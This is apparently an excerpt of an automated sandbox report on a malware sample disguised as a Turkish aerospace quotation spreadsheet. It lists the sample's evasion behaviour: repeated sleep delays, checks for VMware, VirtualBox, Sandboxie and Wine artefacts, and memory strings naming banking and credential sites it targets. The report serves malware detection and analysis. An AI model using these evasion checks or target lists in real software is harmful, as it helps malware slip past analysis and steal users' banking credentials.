                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory allocated: 2A1FAF10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory allocated: 2A1FC770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599742Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597496Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597357Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596961Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596840Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596733Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594838Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594605Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594325Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593745Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3191Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6632Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6476Thread sleep count: 3191 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6476Thread sleep count: 6632 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599742s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -598063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597953s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597496s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597357s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -597122s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596961s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596840s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596733s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595406s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595297s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -595063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594953s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594838s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594605s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594325s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -594003s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -593875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -593745s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -593641s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232Thread sleep time: -593531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599742Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597496Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597357Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596961Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596840Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596733Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594838Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594605Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594325Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593745Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593531Jump to behavior
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
